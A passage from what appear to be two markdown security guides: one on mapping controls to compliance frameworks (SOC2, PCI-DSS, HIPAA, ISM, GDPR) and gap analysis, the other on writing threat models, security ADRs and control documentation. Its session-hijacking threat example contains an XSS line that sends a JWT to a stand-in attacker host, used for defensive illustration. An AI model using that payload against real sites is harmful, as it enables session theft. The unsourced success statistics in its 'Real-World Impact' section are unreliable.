| CC6.6 (Encryption) | Encryption | ENC-1: At rest | AWS KMS | kms-config.json | ✅ Complete |
| CC6.6 | Encryption | ENC-2: In transit | TLS 1.3 | nginx-ssl-config | ✅ Complete |
| CC7.2 (Monitoring) | Audit Logging | LOG-1: Auth events | CloudWatch | cloudwatch-config | ✅ Complete |
| CC7.2 | Audit Logging | LOG-2: Data access | PostgreSQL | pg-audit-config | ⚠️ Partial (retention = 30 days, need 90) |
| CC8.1 (Change mgmt) | Config Mgmt | CM-1: Version control | GitHub | github-repos | ❌ Missing approval workflow |
```
**Gap identification**: ⚠️ Partial and ❌ Missing items become your remediation backlog.
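The matrix also lends itself to lightweight automation. A minimal sketch, assuming the matrix is exported to a hypothetical `traceability.csv` with `Criterion`, `Our Control`, and `Status` columns:
```python
import csv
from collections import defaultdict

def extract_gaps(matrix_path: str) -> dict:
    """Group non-complete rows by criterion to build a remediation backlog."""
    gaps = defaultdict(list)
    with open(matrix_path, newline="") as f:
        for row in csv.DictReader(f):
            status = row["Status"].strip()
            if not status.startswith("✅"):          # ⚠️ Partial or ❌ Missing
                gaps[row["Criterion"]].append((row["Our Control"], status))
    return dict(gaps)

if __name__ == "__main__":
    for criterion, items in extract_gaps("traceability.csv").items():
        print(f"{criterion}:")
        for control, status in items:
            print(f"  - {control}: {status}")
```
Anything this prints becomes a candidate entry for the gap analysis in Step 6.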
### Step 6: Gap Analysis and Remediation
Identify missing/insufficient controls, prioritize by risk.
#### Gap Analysis Template
```markdown
# Compliance Gap Analysis: SOC2
## Critical Gaps (Block Audit)
### GAP-1: Missing Change Management Approval Workflow
- **Requirement**: CC8.1 - Changes must have approval before production
- **Current state**: Git commits directly to main without approval
- **Impact**: HIGH - Cannot pass SOC2 without this
- **Remediation**:
- Implement GitHub branch protection (require PR approval)
- Create approval policy (2 reviewers for production changes)
- Document change management policy
- **Timeline**: 2 weeks
- **Owner**: DevOps Lead
- **Cost**: $0 (GitHub feature)
## High-Priority Gaps (Remediate Before Audit)
### GAP-2: Insufficient Log Retention
- **Requirement**: CC7.2 - Logs retained for 90 days minimum
- **Current state**: PostgreSQL logs retained 30 days
- **Impact**: MEDIUM - Auditor will note as deficiency
- **Remediation**:
- Extend PostgreSQL log retention to 90 days
- Archive to S3 for long-term storage
- Update retention policy document
- **Timeline**: 1 week
- **Owner**: Platform Engineer
- **Cost**: ~$50/month (S3 storage)
## Low-Priority (Post-Audit)
### GAP-3: No Formal Incident Response Tabletop Exercises
- **Requirement**: CC7.5 - Test incident response procedures
- **Current state**: IR runbooks exist but not tested
- **Impact**: LOW - Can be remediated post-audit
- **Remediation**: Schedule quarterly IR tabletop exercises
- **Timeline**: 3 months
- **Owner**: Security Team
```
**Prioritization**:
1. **Critical**: Must fix before audit (blocks compliance)
2. **High**: Should fix before audit (reduces risk of findings)
3. **Low**: Can defer to post-audit (continuous improvement)
## Universal Control Categories
**Frameworks differ in details but share core categories.**
### 1. Access Control
- Authentication (passwords, MFA, SSO)
- Authorization (RBAC, ABAC, least privilege)
- Session management (timeouts, revocation)
### 2. Encryption
- Data at rest (AES-256, key management)
- Data in transit (TLS 1.2+)
- Key rotation and access control
### 3. Audit Logging
- Authentication events (login, logout, failures)
- Data access (who accessed what, when)
- Admin actions (configuration changes, user management)
- Log retention (30-90 days typical, varies by framework)
### 4. Incident Response
- Detection (monitoring, alerting)
- Containment (isolation procedures)
- Recovery (restoration procedures)
- Lessons learned (post-incident reviews)
### 5. Vulnerability Management
- Patch management (timely updates)
- Vulnerability scanning (regular cadence)
- Penetration testing (annual or on major changes)
### 6. Configuration Management
- Secure baselines (hardening guides)
- Change control (approval processes)
- Configuration monitoring (detect drift)
### 7. Personnel Security
- Background checks (role-appropriate)
- Security training (annual, role-specific)
- Offboarding procedures (revoke access)
### 8. Physical Security
- Facility access controls
- Environmental controls (fire, flood)
- Equipment disposal (data sanitization)
**Use this as checklist**: Most frameworks require these categories. Implement once, map to multiple frameworks.
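For example, a single implemented control can be recorded once and mapped to the criteria it satisfies in several frameworks (the criterion IDs below are illustrative; verify them against the current framework versions):
```python
# One implemented control, mapped once to the criteria it claims to satisfy.
CONTROLS = {
    "ENC-1": {
        "description": "Data at rest encrypted with AES-256 (KMS-managed keys)",
        "maps_to": {
            "SOC2": ["CC6.6"],
            "PCI-DSS": ["Requirement 3"],
            "ISO 27001": ["A.8.24"],
        },
    },
}

def coverage(framework: str) -> list[str]:
    """List our control IDs that claim coverage for the given framework."""
    return [cid for cid, ctrl in CONTROLS.items() if framework in ctrl["maps_to"]]

print(coverage("SOC2"))   # ['ENC-1']
```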
## Framework-Specific Nuances
### SOC2 (Service Organization Control 2)
**Purpose**: Trust assurance for service providers (SaaS, cloud)
**Trust Service Criteria**:
- Security (always required)
- Availability (optional)
- Processing Integrity (optional)
- Confidentiality (optional)
- Privacy (optional)
**Key Requirements**:
- Annual audit (Type I = point-in-time, Type II = over period, typically 6-12 months)
- Control documentation (policies, procedures)
- Evidence of operation (logs, reports, test results)
- Continuous monitoring
**Common Gap**: SOC2 Type II requires evidence of controls operating over time (not just implemented). Need historical logs, incident reports, change records.
### PCI-DSS (Payment Card Industry Data Security Standard)
**Purpose**: Protect payment card data
**12 Requirements** (grouped into 6 control objectives):
1. Build and maintain secure network
2. Protect cardholder data
3. Maintain vulnerability management
4. Implement strong access control
5. Regularly monitor and test networks
6. Maintain information security policy
**Key Requirements**:
- Quarterly vulnerability scans (by Approved Scanning Vendor)
- Annual penetration testing
- Cardholder data encryption (PAN never stored in plaintext)
- Strict access control (need-to-know basis)
**Common Gap**: Many developers store PAN (Primary Account Number) in logs or databases. PCI-DSS forbids this - use tokenization instead.
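A minimal sketch of the logging side of that gap, masking PANs before they reach a log line (illustrative only; real cardholder data handling should use a dedicated tokenization or vault service rather than ad hoc code):
```python
import re

# Matches 13-19 consecutive digits, the typical PAN length range
PAN_PATTERN = re.compile(r"\b(\d{6})(\d{3,9})(\d{4})\b")

def mask_pan(text: str) -> str:
    """Replace the middle digits of anything that looks like a PAN before logging."""
    return PAN_PATTERN.sub(lambda m: m.group(1) + "*" * len(m.group(2)) + m.group(3), text)

print(mask_pan("charge failed for card 4111111111111111"))
# -> "charge failed for card 411111******1111"
```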
### HIPAA (Health Insurance Portability and Accountability Act) - US Healthcare
**Purpose**: Protect patient health information (PHI)
**Key Rules**:
- **Privacy Rule**: Patient rights to access/control their PHI
- **Security Rule**: Technical safeguards for electronic PHI (ePHI)
- **Breach Notification Rule**: Report breaches affecting 500+ individuals
**Key Requirements**:
- Encryption (not strictly required but effectively mandatory via "addressable" safeguards)
- Access controls (role-based, minimum necessary)
- Audit trails (track all ePHI access)
- Business Associate Agreements (BAAs with vendors)
**Common Gap**: Developers forget BAAs are required for ANY vendor processing ePHI (cloud providers, analytics tools, etc.).
### ISM (Information Security Manual) + IRAP - Australia Government
**Purpose**: Protect government information systems
**IRAP**: Infosec Registered Assessors Program (authorized assessors)
**Key Requirements**:
- ISM compliance (Essential Eight at minimum)
1. Application control (whitelisting)
2. Patch applications
3. Configure Microsoft Office macros
4. User application hardening
5. Restrict administrative privileges
6. Patch operating systems
7. Multi-factor authentication
8. Daily backups
- Classification handling (UNOFFICIAL, OFFICIAL, SECRET, TOP SECRET)
- IRAP assessment (required for government contracts)
**Common Gap**: Essential Eight is minimum, but full ISM compliance has hundreds of controls. Scope carefully based on classification level.
### GDPR (General Data Protection Regulation) - EU
**Purpose**: Protect personal data of EU residents
**Key Principles**:
- Lawful basis for processing (consent, contract, legal obligation, etc.)
- Data minimization (collect only necessary data)
- Right to access, rectify, erase (data subject rights)
- Data breach notification (72 hours to supervisory authority)
**Key Requirements**:
- Privacy by design and default
- Data Protection Impact Assessment (DPIA) for high-risk processing
- Data Processing Agreements (DPAs with processors)
- EU representative (if outside EU but processing EU data)
**Common Gap**: GDPR applies to ANY company processing EU resident data, regardless of company location. Many US companies underestimate scope.
## Evidence Collection
**Auditors need evidence that controls are operating, not just documented.**
### Evidence Types
#### 1. Configuration Evidence
```bash
# Example: TLS configuration
openssl s_client -connect api.example.com:443 -tls1_3
# Save output showing TLS 1.3 enabled
# Example: IAM MFA enforcement
aws iam generate-credential-report && aws iam get-credential-report
# Save the credential report showing mfa_active = true for every user
```
#### 2. Log Evidence
```bash
# Example: Authentication logs (last 7 days)
aws logs filter-log-events \
--log-group-name /aws/lambda/auth \
--start-time $(date -d '7 days ago' +%s)000 \
--filter-pattern 'authentication'
# Save sample showing successful/failed logins logged
```
#### 3. Policy Documentation
```markdown
# Example: Access Control Policy
- All users must authenticate with MFA
- Role-based access (roles defined in roles.md)
- Session timeout: 30 minutes
- Annual access review by manager
```
#### 4. Test Results
```markdown
# Penetration Test Report (Annual)
- Date: 2025-03-15
- Tester: Acme Security (SOC2 requirement)
- Findings: 2 medium, 5 low
- Remediation: All medium fixed within 30 days
- Evidence: pentest-report-2025.pdf
```
#### 5. Interview Records
```markdown
# Auditor Interview: DevOps Lead (2025-04-10)
Q: How do you handle production changes?
A: Pull request → 2 approvals → CI/CD deploy → post-deploy verification
Q: How long are logs retained?
A: 90 days in CloudWatch, then archived to S3 for 7 years
Evidence: interview-notes-devops-2025-04-10.md
```
## Control Mapping Workflow
### Workflow: Preparing for Audit
```
1. Discovery (Week 1)
└─→ Identify applicable frameworks (jurisdiction + industry + data type)
└─→ Understand framework structure (categories, requirements, evidence)
2. Inventory (Week 2-3)
└─→ Document existing technical controls
└─→ Document operational controls (policies, procedures)
└─→ Document evidence locations
3. Mapping (Week 4)
└─→ Create traceability matrix (controls → requirements)
└─→ Identify gaps (missing/insufficient controls)
4. Gap Analysis (Week 5)
└─→ Prioritize gaps (critical/high/low)
└─→ Estimate remediation effort and cost
5. Remediation (Week 6-12)
└─→ Fix critical gaps (blockers)
└─→ Fix high-priority gaps (reduce risk)
└─→ Document all changes
6. Evidence Collection (Week 13-14)
└─→ Gather configuration evidence
└─→ Gather log samples
└─→ Finalize policy documents
└─→ Conduct test activities (if needed)
7. Audit (Week 15-16)
└─→ Provide evidence to auditor
└─→ Answer auditor questions
└─→ Address any findings
8. Continuous Monitoring (Ongoing)
└─→ Maintain controls
└─→ Collect evidence continuously
└─→ Annual re-assessment
```
## Quick Reference: Framework Selection
| If you have... | Consider these frameworks... | Priority |
|----------------|------------------------------|----------|
| **Australian government data** | ISM, IRAP, PSPF | Mandatory |
| **Australian private healthcare** | Privacy Act, Healthcare-specific | Mandatory |
| **US healthcare (HIPAA data)** | HIPAA, HITECH | Mandatory |
| **EU resident data** | GDPR | Mandatory |
| **Payment card data** | PCI-DSS | Mandatory |
| **US government contracts** | FedRAMP, FISMA, NIST 800-53 | Mandatory |
| **B2B SaaS (any jurisdiction)** | SOC2 | High priority |
| **Enterprise software** | ISO 27001 | Medium priority |
| **UK government** | Cyber Essentials, NCSC | Mandatory |
**Always verify**: This table is a starting point, not definitive. Consult legal/compliance experts for your specific situation.
## Common Mistakes
### ❌ Assuming Frameworks Without Asking
**Wrong**: "We need SOC2" (without checking customer requirements)
**Right**: "What do our customers/contracts require? What jurisdiction are we in?"
**Why**: You might need multiple frameworks, or different ones than assumed.
### ❌ Memorizing Framework Details
**Wrong**: Try to remember all SOC2 criteria, all PCI-DSS requirements
**Right**: Learn discovery process, reference frameworks as needed
**Why**: Frameworks update (e.g., PCI-DSS v4.0 in 2024). Process is stable, details change.
### ❌ Mapping Without Inventory
**Wrong**: Read framework, try to build controls from scratch to match
**Right**: Inventory existing controls first, then map to framework
**Why**: Easier to map existing controls than build from requirements. Avoids duplicate implementations.
### ❌ No Gap Prioritization
**Wrong**: List all gaps, start working on first one
**Right**: Prioritize by impact (critical = blocks audit, high = findings, low = post-audit)
**Why**: Time/budget limited. Fix blockers first, optimize later.
### ❌ Treating Compliance as One-Time
**Wrong**: Pass audit, stop maintaining controls
**Right**: Continuous monitoring, annual re-assessment, maintain evidence
**Why**: Most audits are annual or more frequent. Controls must operate continuously.
## Cross-References
**Use WITH this skill**:
- `ordis/security-architect/security-controls-design` - Implement controls identified in gap analysis
- `muna/technical-writer/clarity-and-style` - Write clear policy documentation
**Use AFTER this skill**:
- `ordis/security-architect/security-authorization-and-accreditation` - If government/defense (ATO/SSP/SAR)
- `muna/technical-writer/operational-acceptance-documentation` - Document audit package
## Real-World Impact
**Projects using systematic compliance mapping**:
- **Healthcare SaaS (Australia)**: Discovered 4 applicable frameworks in discovery (not just Privacy Act). Avoided surprise compliance requirements pre-launch.
- **SOC2 Type II (US)**: Gap analysis found 12 missing controls, prioritized 3 as critical. Remediated in 6 weeks, passed audit on first attempt (vs industry avg 2-3 attempts).
- **IRAP Assessment (Australia Gov)**: Traceability matrix with 200+ ISM controls mapped to 47 technical implementations. Assessor praised "clearest control mapping in 5 years".
**Key lesson**: **Discovery process (ask jurisdiction/industry/data type) finds ALL applicable frameworks. Control mapping with traceability prevents gaps and audit failures.**


@@ -0,0 +1,620 @@
# Documenting Threats and Controls
## Overview
Document security decisions with threat context and traceability. Core principle: **Security documentation explains WHY (threat), WHAT (control), and HOW to verify**.
**Key insight**: Good security documentation enables verification and informed risk decisions. Bad security documentation is "we're secure" without evidence.
## When to Use
Load this skill when:
- Writing threat models
- Documenting security architecture decisions (ADRs)
- Creating control documentation (SSP, compliance)
- Writing security requirements with traceability
**Symptoms you need this**:
- "How do I document this security decision?"
- Writing threat model documentation
- Creating security ADRs
- Preparing control documentation for audits
**Don't use for**:
- General documentation (use `muna/technical-writer/documentation-structure`)
- Non-security ADRs
## Threat Documentation
### Pattern: Threat Description
**Structure**:
```markdown
# Threat: [Threat Name]
## Description
**What**: [What is the threat?]
**How**: [How is attack executed?]
**Who**: [Threat actor - external attacker, insider, malicious code]
## Affected Assets
- [Asset 1] (e.g., customer database)
- [Asset 2] (e.g., API authentication tokens)
## Attack Scenarios
### Scenario 1: [Name]
1. Attacker action 1
2. System response
3. Attacker action 2
4. Impact
### Scenario 2: [Name]
[Steps]
## Likelihood and Impact
**Likelihood**: Low / Medium / High
**Justification**: [Why this likelihood? Historical data, attack complexity]
**Impact**: Low / Medium / High / Critical
**Justification**: [What happens if successful? Data breach? System compromise?]
**Risk Score**: Likelihood × Impact = [Score]
## Mitigations
- [Mitigation 1] → See Control: [Control ID]
- [Mitigation 2] → See Control: [Control ID]
## Residual Risk
After mitigations: [Describe remaining risk]
**Accepted by**: [Role/Name] on [Date]
```
### Example: Session Hijacking Threat
```markdown
# Threat: Session Hijacking via Token Theft
## Description
**What**: Attacker steals session token and impersonates legitimate user
**How**: XSS attack injects JavaScript to extract token from localStorage
**Who**: External attacker (internet-facing attack), insider with XSS injection capability
## Affected Assets
- User session tokens (JWT stored in browser localStorage)
- Customer personal data (accessible via hijacked session)
- Administrative functions (if admin session hijacked)
## Attack Scenarios
### Scenario 1: Stored XSS
1. Attacker injects malicious script via user profile field (e.g., bio)
2. Script stored in database without sanitization
3. Victim views attacker's profile
4. Script executes: `fetch('https://attacker.com/?token=' + localStorage.getItem('jwt'))`
5. Attacker receives victim's token
6. Attacker uses token to make API calls as victim
### Scenario 2: Reflected XSS
1. Attacker sends victim malicious link: `https://app.com/search?q=<script>/* malicious */</script>`
2. Victim clicks link
3. Search query reflected in page without sanitization
4. Script executes and exfiltrates token
## Likelihood and Impact
**Likelihood**: MEDIUM
**Justification**: XSS vulnerabilities are common (OWASP Top 10). Application has user-generated content (profiles, comments). No Content Security Policy detected.
**Impact**: HIGH
**Justification**: Hijacked session grants full user access including:
- Personal data of victim (PII)
- Financial transactions (if applicable)
- Admin functions (if admin token hijacked)
Data breach affects confidentiality, integrity, availability.
**Risk Score**: Medium × High = HIGH RISK
## Mitigations
- **CSP (Content Security Policy)**: Prevents inline script execution → See Control: SC-18
- **HTTPOnly cookies**: Token not accessible to JavaScript → See Control: SC-8
- **Output encoding**: HTML-encode all user-generated content → See Control: SI-10
- **Token expiration**: Limit hijacked token lifespan to 30 minutes → See Control: AC-12
- **Session invalidation**: Logout invalidates token server-side → See Control: AC-12
## Residual Risk
After mitigations: **LOW**
- Risk remains if attacker exploits 0-day XSS within 30-minute token window
- Mitigation: Monitoring for anomalous API usage patterns
**Accepted by**: Chief Security Officer on 2025-03-15
```
**Key elements**:
- Specific attack steps (not vague "attacker compromises system")
- Likelihood/impact with justification
- Traceability to controls (Control IDs)
- Residual risk with acceptance
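These elements can also be captured in a small structure so traceability is checkable rather than aspirational. A minimal sketch (the field names and threshold are illustrative, not a required schema):
```python
from dataclasses import dataclass, field

LEVELS = {"LOW": 1, "MEDIUM": 2, "HIGH": 3, "CRITICAL": 4}

@dataclass
class Threat:
    name: str
    likelihood: str                                        # LOW / MEDIUM / HIGH
    impact: str                                            # LOW / MEDIUM / HIGH / CRITICAL
    mitigations: list[str] = field(default_factory=list)   # control IDs, e.g. "SC-18"
    residual_risk_accepted_by: str | None = None

    @property
    def risk(self) -> int:
        """Risk score = likelihood x impact (ordinal product)."""
        return LEVELS[self.likelihood] * LEVELS[self.impact]

def untraced_high_risks(threats: list[Threat]) -> list[str]:
    """Threats above the threshold with no linked controls and no formal acceptance."""
    return [t.name for t in threats
            if t.risk >= 6 and not t.mitigations and t.residual_risk_accepted_by is None]

hijack = Threat("Session hijacking via token theft", "MEDIUM", "HIGH",
                mitigations=["SC-18", "SC-8", "SI-10", "AC-12"])
print(untraced_high_risks([hijack]))   # [] -> every high-risk threat is traced to controls
```
Running a check like this over the threat register makes the "all HIGH threats mitigated or risk-accepted" success criterion in the ADR template below verifiable.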
## Security ADRs
### Pattern: Security Architecture Decision Record
**Structure**:
```markdown
# ADR-XXX: [Security Decision Title]
## Status
Proposed | Accepted | Deprecated | Superseded by ADR-YYY
## Context
### Problem Statement
What security problem are we solving?
### Threat Model
- **Threat 1**: [Brief description] → High risk
- **Threat 2**: [Brief description] → Medium risk
### Constraints
- Regulatory requirements (GDPR, HIPAA, etc.)
- Performance requirements
- Compatibility requirements
- Budget constraints
### Assumptions
- User authentication level (MFA, password-only)
- Network trust model (zero-trust, perimeter-based)
- Threat actor capabilities (nation-state, script kiddie, insider)
## Decision
We will [chosen approach].
### Security Properties
- **Confidentiality**: [How protected?]
- **Integrity**: [How ensured?]
- **Availability**: [How maintained?]
- **Auditability**: [What's logged?]
### Technical Details
[Implementation specifics: algorithms, key sizes, protocols]
## Alternatives Considered
### Alternative 1: [Name]
**Pros**: [Security benefits]
**Cons**: [Security drawbacks]
**Why not chosen**: [Reason]
### Alternative 2: [Name]
[Similar structure]
## Consequences
### Security Benefits
- [Benefit 1]
- [Benefit 2]
### Security Trade-offs
- [Trade-off 1: performance vs security]
- [Trade-off 2: usability vs security]
### Residual Risks
- **Risk 1**: [Description] - Severity: [Low/Medium/High]
- Mitigation: [How addressed]
- Accepted by: [Role] on [Date]
- **Risk 2**: [Description]
### Ongoing Security Requirements
- [Operational requirement 1: key rotation every 90 days]
- [Operational requirement 2: quarterly security review]
## Security Controls
- Control AC-2: Account management
- Control IA-5: Authenticator management
- Control SC-8: Transmission confidentiality
(If compliance framework applicable, map to specific control IDs)
## Verification
### Testing Strategy
- [Test 1: Penetration test focus area]
- [Test 2: Functional security test]
### Success Criteria
- [ ] All HIGH threats mitigated or risk-accepted
- [ ] Security properties verifiable via testing
- [ ] Monitoring in place for security events
## References
- Threat model: [Link to threat model doc]
- Security requirements: [Link to requirements]
- Implementation: [Link to code/config]
**Approver**: [Security Architect] on [Date]
```
### Example: JWT Authentication ADR
```markdown
# ADR-042: JWT Tokens for API Authentication
## Status
Accepted
## Context
### Problem Statement
The API requires a stateless authentication mechanism for 10,000+ concurrent users across geographically distributed servers. Session storage (Redis) becomes a bottleneck at this scale.
### Threat Model
- **Threat 1: Token theft via XSS** → HIGH risk (OWASP Top 10)
- **Threat 2: Token forgery** → HIGH risk (impersonate any user)
- **Threat 3: Token replay** → MEDIUM risk (reuse stolen token)
- **Threat 4: Key compromise** → CRITICAL risk (forge all tokens)
### Constraints
- Must support 10k requests/sec
- Latency budget: <50ms for auth check
- No shared state (stateless servers)
- GDPR compliance (no PII in tokens)
### Assumptions
- Attackers have network access (internet-facing API)
- HTTPS enforced (TLS 1.3)
- Users authenticate with email + password + MFA
## Decision
We will use **JWT (JSON Web Tokens) with RS256 signatures** for API authentication.
### Security Properties
- **Confidentiality**: Token contains no sensitive data (user ID only). Claims are public but integrity-protected.
- **Integrity**: RS256 signature prevents forgery. Only server with private key can create valid tokens.
- **Availability**: Stateless design scales horizontally without shared session store.
- **Auditability**: Token includes `iat` (issued at) and `exp` (expiration). All auth failures logged to CloudWatch.
### Technical Details
- **Algorithm**: RS256 (RSA with SHA-256)
- **Key size**: 2048-bit RSA keys
- **Token structure**:
```json
{
"sub": "user_12345", // subject (user ID)
"iat": 1678886400, // issued at (timestamp)
"exp": 1678888200, // expiration (30 min)
"roles": ["user"] // authorization roles
}
```
- **Storage**: HttpOnly, Secure cookie (not localStorage to prevent XSS theft)
- **Expiration**: 30 minutes
- **Revocation**: Server-side blacklist for logout (Redis, key = token JTI, TTL = remaining token lifetime)
## Alternatives Considered
### Alternative 1: Opaque Session Tokens (Redis)
**Pros**: Easy revocation (delete from Redis), less crypto complexity
**Cons**: Requires a shared Redis cluster (single point of failure), adds ~10ms latency per auth check (Redis lookup), and ties horizontal scaling to the shared session store
**Why not chosen**: Latency and scalability constraints
### Alternative 2: OAuth 2.0 with Authorization Server
**Pros**: Industry standard, mature ecosystem
**Cons**: Adds complexity (separate auth server), network dependency for token validation, overkill for first-party API
**Why not chosen**: Complexity vs benefit not justified for first-party use case
### Alternative 3: API Keys
**Pros**: Simplest possible auth
**Cons**: No expiration (long-lived secrets), no user identity (shared key), revocation difficult
**Why not chosen**: Security properties insufficient (no expiration, shared secrets)
## Consequences
### Security Benefits
- **Forgery protection**: RS256 signature requires private key (only server has)
- **Tamper detection**: Any modification invalidates signature
- **Time-limited**: 30-minute expiration limits stolen token lifespan
- **HttpOnly cookie**: XSS cannot steal token (JavaScript cannot access)
### Security Trade-offs
- **Revocation complexity**: Logout requires server-side blacklist (not truly stateless)
- **Key management**: Private key is critical secret (compromise = forge all tokens)
- **Clock skew**: Servers must have synchronized clocks for expiration validation
### Residual Risks
- **Risk 1: Token theft via network sniffing** - Severity: LOW
- Mitigation: HTTPS/TLS 1.3 encrypts tokens in transit
- Residual: None (HTTPS enforced at load balancer, HSTS enabled)
- Accepted by: CISO on 2025-03-15
- **Risk 2: Private key compromise** - Severity: CRITICAL
- Mitigation: Key stored in AWS Secrets Manager with IAM restrictions, rotated every 90 days, access audited
- Residual: Key theft remains possible via insider threat or infrastructure compromise
- Accepted by: CISO on 2025-03-15 (continuous monitoring for suspicious token generation)
- **Risk 3: XSS in legacy pages** - Severity: MEDIUM
- Mitigation: Content Security Policy (CSP) blocks inline scripts, output encoding on all user content
- Residual: 0-day XSS could bypass CSP before patch
- Accepted by: CISO on 2025-03-15 (30-minute token window limits exposure)
### Ongoing Security Requirements
- **Key rotation**: Rotate RS256 key pair every 90 days (automated via AWS Secrets Manager rotation)
- **Monitoring**: Alert on spike in auth failures (>100/min), unusual token generation patterns
- **Blacklist cleanup**: Redis blacklist entries expire with token TTL (no manual cleanup needed)
- **Annual review**: Re-assess threat model and key size (quantum computing advances)
## Security Controls
- **IA-5(1)**: Authenticator management (password + MFA before token issuance)
- **SC-8**: Transmission confidentiality (HTTPS/TLS 1.3)
- **SC-13**: Cryptographic protection (RS256 signature)
- **AC-12**: Session management (30-minute expiration, logout blacklist)
## Verification
### Testing Strategy
- **Penetration test**: Focus on token theft, forgery attempts, replay attacks (Q2 2025)
- **Functional test**: Verify tokens are rejected at 30:01 minutes and that the blacklist prevents reuse of a token after logout
- **Load test**: 10k concurrent users, <50ms auth latency
### Success Criteria
- [x] All HIGH threats have mitigations
- [x] RS256 signature prevents forgery (tested)
- [x] HttpOnly cookie prevents XSS theft (verified in browser)
- [x] CloudWatch monitors auth failures
- [x] Key rotation automated
## References
- Threat model: `/docs/threat-model-api-auth.md`
- Implementation: `src/auth/jwt-middleware.ts`
- Key management: `infrastructure/secrets-manager-key-rotation.yaml`
**Approver**: Security Architect (Jane Smith) on 2025-03-15
```
**Key elements**:
- Threat model context (4 threats with risk levels)
- Security properties (C/I/A/Auditability)
- Specific technical details (RS256, 2048-bit, HttpOnly cookie)
- Alternatives with security pros/cons
- Residual risks with severity and acceptance
- Traceability to controls (IA-5, SC-8, SC-13, AC-12)
- Verification strategy
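To ground the decision, a minimal verification sketch (assuming the PyJWT library; `PUBLIC_KEY_PEM` and `is_revoked` are hypothetical stand-ins for the key loaded from the secrets manager and the Redis JTI blacklist):

```python
import jwt  # PyJWT, assumed available
from jwt import InvalidTokenError

PUBLIC_KEY_PEM = "..."  # hypothetical: RS256 public key loaded at startup

def is_revoked(jti: str) -> bool:
    """Placeholder for the Redis logout blacklist described in the ADR."""
    return False

def verify_request_token(token: str) -> dict:
    try:
        # Signature and expiration (exp) are checked by PyJWT
        claims = jwt.decode(token, PUBLIC_KEY_PEM, algorithms=["RS256"])
    except InvalidTokenError as exc:
        raise PermissionError(f"Invalid token: {exc}")
    # Logout blacklist: reject tokens whose JTI was revoked server-side
    if is_revoked(claims.get("jti", "")):
        raise PermissionError("Token has been revoked")
    return claims
```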
## Control Documentation
### Pattern: Security Control Description
**Use for**: SSP (System Security Plan), compliance documentation, audit evidence.
**Structure**:
```markdown
## Control: [ID] - [Name]
### Control Objective
What does this control protect against? What security property does it enforce?
### Implementation Description
**How it works** (technical details):
- Component 1: [Description]
- Component 2: [Description]
**Configuration**:
```yaml
# Example config snippet
setting: value
```
**Responsible Parties**:
- Implementation: [Role, Name]
- Operation: [Role, Name]
- Monitoring: [Role, Name]
### Assessment Procedures
**How to verify this control works**:
1. **Examine**: Review [documentation, configuration, logs]
2. **Interview**: Ask [role] about [process]
3. **Test**: Execute [test procedure], expected result: [outcome]
### Evidence Artifacts
- Configuration: `/path/to/config.yaml`
- Logs: CloudWatch Log Group `/aws/lambda/auth`, query: `[Filter pattern]`
- Policy: `/docs/account-management-policy.pdf`
- Test results: `/evidence/penetration-test-2025-Q1.pdf`
### Compliance Mapping
- NIST SP 800-53: AC-2
- SOC2: CC6.1 (Logical access controls)
- ISO 27001: A.9.2.1 (User registration and de-registration)
```
### Example: Account Management Control
```markdown
## Control: AC-2 - Account Management
### Control Objective
Ensure only authorized individuals have system access. Prevent unauthorized access via account lifecycle management (creation, modification, disablement, removal).
**Security properties enforced**:
- **Authentication**: Valid accounts only
- **Accountability**: All accounts traceable to individuals
- **Least privilege**: Accounts have minimum necessary permissions
### Implementation Description
**How it works**:
- **Account creation**: ServiceNow workflow → Manager approval → Automated provisioning via Terraform
- **Access assignment**: Role-based access control (RBAC) - roles defined in `/docs/rbac-roles.md`
- **Inactivity disablement**: Automated script checks last login date, disables accounts after 30 days inactivity
- **Account removal**: Offboarding workflow triggers immediate disablement, deletion after 90-day retention period
**Configuration**:
```python
# Account lifecycle settings
INACTIVITY_THRESHOLD_DAYS = 30
ACCOUNT_RETENTION_DAYS = 90
MANAGER_APPROVAL_REQUIRED = True
```
**Responsible Parties**:
- **Implementation**: DevOps Engineer (John Doe)
- **Operation**: System Administrator (Jane Smith)
- **Monitoring**: Information System Security Officer (ISSO, Bob Johnson)
### Assessment Procedures
**How to verify this control works**:
1. **Examine**: Review ServiceNow account creation tickets, verify manager approval present for all requests in last 90 days
- Evidence: ServiceNow query results (`status=approved, created_date>90d`)
2. **Interview**: Ask System Administrator:
- "How do you create new accounts?"
- "What happens if someone requests account without manager approval?"
- Expected answers: "ServiceNow enforces approval workflow, request cannot proceed without approval"
3. **Test**: Attempt to create account without manager approval
- Procedure: Submit ServiceNow ticket, skip approval step
- Expected result: Request rejected with error "Manager approval required"
- Actual result: ✅ Request rejected (tested 2025-03-10)
4. **Test**: Verify inactivity disablement
- Procedure: Create test account, wait 31 days without login, attempt login
- Expected result: Login fails with "Account disabled due to inactivity"
- Actual result: ✅ Account disabled (tested 2025-02-15)
### Evidence Artifacts
- **Configuration**: `/infrastructure/terraform/iam-accounts.tf`
- **Logs**:
- Account creation: CloudWatch Log Group `/aws/servicenow/accounts`, query: `fields @timestamp, username, manager_approval_status | filter action="create"`
- Inactivity disablements: CloudWatch Log Group `/aws/lambda/account-lifecycle`, query: `fields @timestamp, username, reason | filter reason="inactivity_30d"`
- **Policy**: `/docs/account-management-policy-v2.1.pdf` (approved 2025-01-10)
- **Approval workflow**: ServiceNow workflow screenshot `/evidence/servicenow-account-approval-workflow.png`
- **Test results**: `/evidence/account-management-functional-tests-2025-Q1.pdf`
### Compliance Mapping
- **NIST SP 800-53**: AC-2 (Account Management)
- AC-2(1): Automated account management
- AC-2(3): Disable inactive accounts
- **SOC2**: CC6.1 (Logical and physical access controls - Identifies and authenticates users)
- **ISO 27001**: A.9.2.1 (User registration and de-registration)
- **GDPR**: Article 32 (Security of processing - access control)
```
**Key elements**:
- Objective (WHY this control exists)
- Specific implementation (HOW it works, not vague)
- Assessment procedures (HOW to verify it works)
- Evidence locations (WHERE to find proof)
- Compliance mapping (WHAT frameworks this satisfies)
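The inactivity-disablement component described above could look roughly like this (a sketch only; `directory` is a hypothetical identity-provider client, and a real job would also write audit log entries):

```python
from datetime import datetime, timedelta, timezone

INACTIVITY_THRESHOLD_DAYS = 30

def disable_inactive_accounts(accounts, directory):
    """Disable accounts whose last login is older than the threshold."""
    cutoff = datetime.now(timezone.utc) - timedelta(days=INACTIVITY_THRESHOLD_DAYS)
    for account in accounts:
        if account["enabled"] and account["last_login"] < cutoff:
            # Hypothetical client call; evidence for AC-2(3) comes from its audit log
            directory.disable(account["username"], reason="inactivity_30d")
```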
## Security Requirements
### Pattern: Requirement with Traceability
**Structure**:
```markdown
## Requirement: [ID] - [Title]
